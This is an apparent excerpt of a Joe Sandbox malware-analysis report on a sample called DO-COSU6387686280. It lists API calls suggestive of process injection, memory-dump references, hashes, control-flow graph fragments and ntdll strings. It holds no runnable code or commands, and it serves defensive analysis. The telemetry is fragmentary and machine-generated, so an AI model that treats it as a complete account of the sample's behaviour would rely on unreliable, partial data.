                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05E7B6CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 05E7E04D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 013EAF5E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 05E7E04D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(?), ref: 07490590
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445592546.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7490000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 134772b31d9263f91cab11ee03ac82416e399b598647c7497500db95be0495a3
                                                                                        • Instruction ID: 3d7c24de0c3e53fbc46a9e16572029d27882d5fb58e76eabdb4ab29e616e866f
                                                                                        • Opcode Fuzzy Hash: 134772b31d9263f91cab11ee03ac82416e399b598647c7497500db95be0495a3
                                                                                        • Instruction Fuzzy Hash: 5951E474E0920DDFCB04CF9AD8489EEBBFAFB99310F14A026E459A7211E7309941CB54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e39aa1648a8ab2ca0cd7d1161389c0c72b10ca27514d4934f7499d248468138c
                                                                                        • Instruction ID: a98b17447f603f1cf845939952aca97b62c3d775d8edc314ccea7af8537b7022
                                                                                        • Opcode Fuzzy Hash: e39aa1648a8ab2ca0cd7d1161389c0c72b10ca27514d4934f7499d248468138c
                                                                                        • Instruction Fuzzy Hash: C5513870E002199FDB14DFA9C9809AEFBF6FF89300F24816AD458AB315D7309942CFA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1d39057d286805f2111c7fc2fbd0e159fa387cbc3f8e19b35c8e000eac0d321f
                                                                                        • Instruction ID: fd57cbdf411d45ad97fe84188762d927d327400f0e10cf50df42b993c3a7195d
                                                                                        • Opcode Fuzzy Hash: 1d39057d286805f2111c7fc2fbd0e159fa387cbc3f8e19b35c8e000eac0d321f
                                                                                        • Instruction Fuzzy Hash: 6B410370E0920DDFCB04CFAED8485EEBBF6FB99310F14A12AE45AA7251E7348941CB50

                                                                                        Execution Graph

                                                                                        Execution Coverage:1.1%
                                                                                        Dynamic/Decrypted Code Coverage:5.1%
                                                                                        Signature Coverage:5.1%
                                                                                        Total number of Nodes:138
                                                                                        Total number of Limit Nodes:10

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 272 42ca43-42ca7c call 404743 call 42dc93 NtClose
                                                                                        APIs
                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 3a648ce88628a05c2ddc7387a078bf85c9b2b0d74a8cd61bb1559c6bf325344b
                                                                                        • Instruction ID: 5121de7a3503c7c05ab04a2345a93f5a7ea96df4153e346bd077cc8f1e2ea0d1
                                                                                        • Opcode Fuzzy Hash: 3a648ce88628a05c2ddc7387a078bf85c9b2b0d74a8cd61bb1559c6bf325344b
                                                                                        • Instruction Fuzzy Hash: B6E0DF312042047BC210AF6ADC41FA7735CEBC5318F004429FA0C67141C3B1B90082B4
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5a0df2086f0a64429751f919be9538894ccab8346bf79a55270c0da338c8f5f0
                                                                                        • Instruction ID: cfb84d624313eadea449f7af612ad7d1e430112c05f136dccf16f7d06bc42ec3
                                                                                        • Opcode Fuzzy Hash: 5a0df2086f0a64429751f919be9538894ccab8346bf79a55270c0da338c8f5f0
                                                                                        • Instruction Fuzzy Hash: 1990026120640003420571584418616808A97E4201B55C031E10145A0DC5258A916226
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5789bbc654ff4568ac711eead2ac9183e1cfcec799800157916e92f139ccd146
                                                                                        • Instruction ID: 73c6f7c825fda3dcc9f0a932bc53ca62dd8125dc3e94d0048e0ae64d0ee70065
                                                                                        • Opcode Fuzzy Hash: 5789bbc654ff4568ac711eead2ac9183e1cfcec799800157916e92f139ccd146
                                                                                        • Instruction Fuzzy Hash: FC90023120540413D21171584508707408997D4241F95C422A0424568DD6568B52A222
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7f656be150585fb9ab6d531a5c02b43d6f57bcb397046b123a75e2ada1d4cb04
                                                                                        • Instruction ID: 85804f4409594ef709451d78ba5fdb81f9cc398358337d6c7682427610d4a138
                                                                                        • Opcode Fuzzy Hash: 7f656be150585fb9ab6d531a5c02b43d6f57bcb397046b123a75e2ada1d4cb04
                                                                                        • Instruction Fuzzy Hash: 0D90023120548802D2107158840874A408597D4301F59C421A4424668DC6958A917222
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c89928f37792d48a4984047122f5992905791b7031c0ee117359313a12cbc9d9
                                                                                        • Instruction ID: f3bf2810e9835c5e9833fea3ed9fbbc400c90e70eb677d4a5a61e155de262d52
                                                                                        • Opcode Fuzzy Hash: c89928f37792d48a4984047122f5992905791b7031c0ee117359313a12cbc9d9
                                                                                        • Instruction Fuzzy Hash: 9890023160950402D20071584518706508597D4201F65C421A0424578DC7958B5166A3

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 0 41411b-414145 2 414191-4141cc 0->2 3 414147 0->3 7 4141e8-414203 2->7 8 4141ce 2->8 3->2 14 414242-414244 7->14 15 414205-414216 7->15 9 4141d0-4141d5 8->9 10 4141d6 8->10 12 4141d7-4141d9 9->12 13 41424c-414253 9->13 10->12 16 414231 12->16 17 4141db 12->17 18 414254 13->18 20 414247 14->20 21 414269-4142e1 call 42ebc3 call 42f5d3 call 417a73 call 4046b3 call 4251d3 14->21 15->18 19 414218-41421a 15->19 22 414264 18->22 19->16 20->22 23 414249 20->23 35 414303-414308 21->35 36 4142e3-4142f4 PostThreadMessageW 21->36 23->13 36->35 37 4142f6-414300 36->37 37->35
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 0-2720052585
                                                                                        • Opcode ID: f5d7dea99f021e5480596321c84ecd1adf560e68dc7d3f496d8e7274470f2bd7
                                                                                        • Instruction ID: b245ee9cd471547411f7a075f1619fd49207f3a0982104024940ee06700587fb
                                                                                        • Opcode Fuzzy Hash: f5d7dea99f021e5480596321c84ecd1adf560e68dc7d3f496d8e7274470f2bd7
                                                                                        • Instruction Fuzzy Hash: F041DC35A00248BBC7218F64DC06BDEBB74EFC5720F1441DAE9406B682D37959C6C7D9

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 38 414232-414245 39 414247 38->39 40 414269-4142e1 call 42ebc3 call 42f5d3 call 417a73 call 4046b3 call 4251d3 38->40 41 414264 39->41 42 414249-414254 39->42 56 414303-414308 40->56 57 4142e3-4142f4 PostThreadMessageW 40->57 42->41 57->56 58 4142f6-414300 57->58 58->56
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 004142F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585
                                                                                        • Opcode ID: 80c9bbe024941fc6e9d360327b0bcd0a035b1dcf475d0bb2f479cfcb765ce6b4
                                                                                        • Instruction ID: 6aff456da46f67235967f719b86724be309bbfe7a69446d3a61f5095063a07e1
                                                                                        • Opcode Fuzzy Hash: 80c9bbe024941fc6e9d360327b0bcd0a035b1dcf475d0bb2f479cfcb765ce6b4
                                                                                        • Instruction Fuzzy Hash: 02213831E0424877DB20AF95DC46FDF7B789F81B40F0440AAFA407B181D678564687D9

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 004142F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585
                                                                                        • Opcode ID: 0ff9b59d8def7a566c38434cf8956a2603b29af83db27bfd155923ecf35f5dbb
                                                                                        • Instruction ID: d959944df4c13c8b7d7073abce3159c561ad81b10d50f84a5f4fed72dc6520e4
                                                                                        • Opcode Fuzzy Hash: 0ff9b59d8def7a566c38434cf8956a2603b29af83db27bfd155923ecf35f5dbb
                                                                                        • Instruction Fuzzy Hash: E9112931E0421C76DB219BA1CC02FDF7F788F41B50F444055FA007B281D7B8564687EA

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 004142F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 247 417a73-417a8f 248 417a97-417a9c 247->248 249 417a92 call 42f703 247->249 250 417aa2-417ab0 call 42fd03 248->250 251 417a9e-417aa1 248->251 249->248 254 417ac0-417ad1 call 42e1a3 250->254 255 417ab2-417abd call 42ffa3 250->255 260 417ad3-417ae7 LdrLoadDll 254->260 261 417aea-417aed 254->261 255->254 260->261
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 262 42cd53-42cd97 call 404743 call 42dc93 RtlAllocateHeap
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(?,0041E874,?,?,00000000,?,0041E874,?,?,?), ref: 0042CD92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 267 42cda3-42cde7 call 404743 call 42dc93 RtlFreeHeap
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,DC37B48D,00000007,00000000,00000004,00000000,004172EC,000000F4), ref: 0042CDE2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 277 42cdf3-42ce2f call 404743 call 42dc93 ExitProcess
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,EE81EF03,?,?,EE81EF03), ref: 0042CE2A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_401000_DO-COSU6387686280.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 424 17d2c0a-17d2c0f 425 17d2c1f-17d2c26 LdrInitializeThunk 424->425 426 17d2c11-17d2c18 424->426
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-2160512332
                                                                                        Strings
                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01805543
                                                                                        • Critical section address, xrefs: 01805425, 018054BC, 01805534
                                                                                        • 8, xrefs: 018052E3
                                                                                        • Critical section address., xrefs: 01805502
                                                                                        • double initialized or corrupted critical section, xrefs: 01805508
                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0180540A, 01805496, 01805519
                                                                                        • Invalid debug info address of this critical section, xrefs: 018054B6
                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054CE
                                                                                        • corrupted critical section, xrefs: 018054C2
                                                                                        • Address of the debug info found in the active list., xrefs: 018054AE, 018054FA
                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054E2
                                                                                        • Critical section debug info address, xrefs: 0180541F, 0180552E
                                                                                        • undeleted critical section in freed memory, xrefs: 0180542B
                                                                                        • Thread identifier, xrefs: 0180553A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                        • API String ID: 0-2368682639
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                        • API String ID: 3446177414-1700792311
                                                                                        Strings
                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01802624
                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018024C0
                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01802506
                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01802409
                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01802412
                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01802602
                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018022E4
                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01802498
                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0180261F
                                                                                        • @, xrefs: 0180259B
                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018025EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                        • API String ID: 0-4009184096
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                        • API String ID: 0-2515994595
                                                                                        APIs
                                                                                        • RtlDebugPrintTimes.NTDLL ref: 0178656C
                                                                                          • Part of subcall function 017865B5: RtlDebugPrintTimes.NTDLL ref: 01786664
                                                                                          • Part of subcall function 017865B5: RtlDebugPrintTimes.NTDLL ref: 017866AF
                                                                                        Strings
                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017E9A2A
                                                                                        • LdrpInitShimEngine, xrefs: 017E99F4, 017E9A07, 017E9A30
                                                                                        • apphelp.dll, xrefs: 01786496
                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017E99ED
                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017E9A01
